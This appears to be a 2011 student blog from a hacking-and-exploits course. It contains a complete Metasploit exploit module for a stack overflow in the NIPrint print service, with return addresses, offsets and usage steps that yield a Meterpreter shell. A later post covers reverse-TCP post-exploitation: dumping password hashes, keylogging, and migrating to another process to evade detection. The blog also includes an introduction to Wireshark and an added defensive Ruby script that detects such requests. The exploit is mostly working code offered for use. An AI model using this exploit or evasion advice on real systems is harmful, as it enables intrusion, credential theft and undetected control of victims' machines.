Saturday, February 26, 2011

Exploit writing for Metasploit in ruby

So today I'm going to explain how exploits can be written as a Metasploit module.
Metasploit modules are written in Ruby. Even if you don't know a lot about Ruby, you should still be able to write a Metasploit exploit module based on this discussion and by referencing some of the existing exploit modules that ship with Metasploit.

Metasploit exploit module structure

A typical Metasploit exploit module consists of the following components:

Header and dependencies:
  • Some comments describing the exploit module
  • require 'msf/core'
Class definition
Includes (mixins)
"def" definitions:
  • initialize
  • check (optional)
  • exploit
You can put comments in your Metasploit module by using the # character. That's all we need to know for now; let's look at the steps to build a Metasploit exploit module.

----------------------------------------------------------------------------------------
##
# $Id: newniprint.rb 00001 2011-02-23 20:45:00Z Malkiat $
##

##
# This exploit module was created by Malkiat Singh for the Week 7 lab of the
# course INFO-6012 Hacking & Exploits.
# It exploits the NIPrint service running on a remote machine.
##

require 'msf/core'   # required for the core Metasploit functionality

class Metasploit3 < Msf::Exploit::Remote   # inherits the remote-exploit behaviour

  include Msf::Exploit::Remote::Tcp   # NIPrint listens on TCP, so mix in the TCP client

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Modified NIPrint Exploit',   # name shown for the exploit
      'Description'    => %q{Performs a stack buffer overflow exploit against the NIPrint service running on a remote machine},
      'Author'         => ['Malkiat Singh'],        # who wrote this module
      'License'        => 'Alone',                  # licence of the module
      'Version'        => '$Revision: 00001 $',     # revision number for this module
      'References'     =>
        [
          ['CVE', '2003-1141'],   # further references for this vulnerability
          ['BID', '8968'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x0a",   # characters that would break the shellcode
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP SP0', { 'Ret' => 0x77D5B99F }],   # Windows XP SP0 return address
          ['Windows XP SP3', { 'Ret' => 0x7C9D30E3 }],   # Windows XP SP3 return address
        ],
      'DefaultTarget'  => 0,   # target used when none is selected
      'DisclosureDate' => 'Feb 23 2011'))

    register_options(
      [
        Opt::RPORT(515)   # default port of the remote NIPrint service
      ], self.class)
  end

  def exploit
    connect   # open the TCP connection

    req = rand_text_alphanumeric(8192)   # random data to send
    req[  0, 2] = "\xeb\x33"
    req[ 49, 4] = [target.ret].pack('V')   # return address at offset 49, found with pattern_offset.rb (see previous post)
    req[ 53, payload.encoded.length ] = payload.encoded   # shellcode placed after the return address

    print_status("Trying target #{target.name}...")
    sock.put(req)   # send the request

    handler      # hand over to the payload handler
    disconnect
  end
end
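From the defender's side, the request the module above builds has a very recognisable shape on TCP/515: an 8 KB request whose first byte is not an LPD command byte and which carries binary bytes where RFC 1179 expects printable text. The following Ruby script is an added example (not part of the original post and not Metasploit code) that flags such requests in a list of flow records. The flow-record format, the 1024-byte threshold and the sample traffic are assumptions constructed for the illustration; the offsets and return address in the sample come from the module above.

```ruby
# Added example, not part of the original post or of Metasploit: a defensive
# check that flags LPD (TCP/515) requests shaped like the one the module above
# sends. The flow-record format and the size threshold are assumptions.

LPD_PORT = 515
MAX_LPD_REQUEST_BYTES = 1024   # assumption: real LPD control requests are far shorter

# RFC 1179 LPD requests start with a command byte 0x01..0x05 followed by
# printable ASCII and a newline; an 8 KB request or binary data in the
# request line has no legitimate reason to appear on this port.
def lpd_request_findings(payload)
  findings = []
  bytes = payload.bytes
  if bytes.size > MAX_LPD_REQUEST_BYTES
    findings << "oversized request (#{bytes.size} bytes)"
  end
  first = bytes.first
  unless first && (1..5).cover?(first)
    findings << format("unexpected command byte 0x%02x", first.to_i)
  end
  binary = bytes.drop(1).count { |b| (b < 0x20 && b != 0x0a && b != 0x0d) || b > 0x7e }
  findings << "#{binary} non-printable bytes in request" if binary > 0
  findings
end

# Scan a list of flow records (hashes with :src, :dst_port, :payload) and
# return one alert string per suspicious LPD request.
def scan_flows(flows)
  flows.each_with_object([]) do |flow, alerts|
    next unless flow[:dst_port] == LPD_PORT
    findings = lpd_request_findings(flow[:payload])
    next if findings.empty?
    alerts << "#{flow[:src]} -> tcp/#{LPD_PORT}: #{findings.join('; ')}"
  end
end

# Constructed sample traffic: one benign "receive job" request and one request
# mirroring the layout the module above builds (two bytes at offset 0, the
# return address at offset 49, data after it; here the data is just filler).
def sample_flows
  benign = "\x02lp\n".b
  hostile = ("A" * 8192).b
  hostile[0, 2]  = "\xeb\x33".b
  hostile[49, 4] = [0x77D5B99F].pack("V")   # SP0 return address from the module
  [
    { src: "10.0.0.5", dst_port: LPD_PORT, payload: benign },
    { src: "10.0.0.9", dst_port: LPD_PORT, payload: hostile },
    { src: "10.0.0.7", dst_port: 80,       payload: "GET / HTTP/1.0\r\n\r\n".b },
  ]
end

if __FILE__ == $0
  scan_flows(sample_flows).each { |a| puts a }
end
```

Run stand-alone it prints a single alert for the 10.0.0.9 flow, naming the oversized request, the bad command byte and the three non-printable bytes of the packed return address; the benign job request and the HTTP flow produce nothing. The same three checks translate directly into a Wireshark display filter or an IDS rule on port 515.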

The following screenshots show the procedure to run this exploit module:
First, find the module using the search command. The module file must be placed inside the 'framework/msf3/modules/exploit' directory. Start Metasploit and search for the module.


Use the module and set options:


Set the option and run the exploit:


A session will be created and a Meterpreter shell is available to control the remote machine. There are a number of commands to execute, which you can list using the help command.

Saturday, February 12, 2011

Wireshark: a great protocol analyzer tool

Today's topic is an introduction to Wireshark, a powerful tool.
Wireshark is a free tool for analyzing the traffic flowing across a network. It is also available for the Windows operating system, and you can download it for free from the website: http://www.wireshark.org/download.html . The installation steps are few and easy to handle. This tool is not only a packet sniffer; we can do a lot more with it. It is a collection of utilities that help us find malicious activities in our network.
It can capture packets on more than one interface at a time. It distinguishes packets by time, protocol, source and destination address, and the type of query or method used. It displays a lot of information about a single packet and about packets reassembled at the destination host. It is able to interpret some attributes automatically to make the security analyst's task easier. Also, it can check packets against their field values and display malicious packets in alerting colors. We can store captures for later review to measure the activities.
Getting familiar with this tool is not cumbersome. Play with the tool and you can explore much more. There is also a good tutorial online to help with its standard operation on the website: http://www.wireshark.org/docs/
We can select an interface to capture the packets travelling on it and get detailed information about every packet, along with the associated hex values. The detailed information is divided by network layer, and at the end the application data is shown in the form of queries, answers or data. When a pool of packets has been gathered, a filter helps you exclude unwanted packets by source or destination address or by protocol. Further, we can disable some protocols from the Enabled Protocols menu item under the Analyze tab.
To conclude, Wireshark is a powerful network protocol analyzer tool that helps us notice malicious activities and unauthorized packets flowing in our network.

Friday, February 4, 2011

Exploiting target machine using meterpreter/reverse_tcp payload

Now I am going to discuss an interesting topic related to manipulation of NIPrint on a target system using the meterpreter/reverse_tcp handler payload.
First, we need to start Metasploit, load the reverse_tcp payload and set additional attributes like RHOST and LHOST, following the steps discussed in the previous blog topic.
This payload exploits the vulnerability on the target system by loading a DLL through reflective DLL injection and opens a command shell back to the attacker for manipulating the target.
When the exploit executes successfully, attackers can use any command from a list of commands to compromise the target. This can be getting the process identifiers of running processes, dumping password hashes, escalating privileges, hiding the current session in another process, starting a keystroke logger and many more.
You can find the list of commands to execute using the 'help' command. A number of core commands, file system commands and so on get listed in the shell window.
An important point is that once you have opened a session by exploiting NIPrint, you can hide your attack in a different process using the 'migrate' command. Your exploit cannot be detected as the current session is now associated with a different process. You can continue to manipulate the target, but no detection system can detect your presence on the target system. Migrating from one process to another helps in continuing the exploit even when applications open and close quickly.
I hope this information is helpful.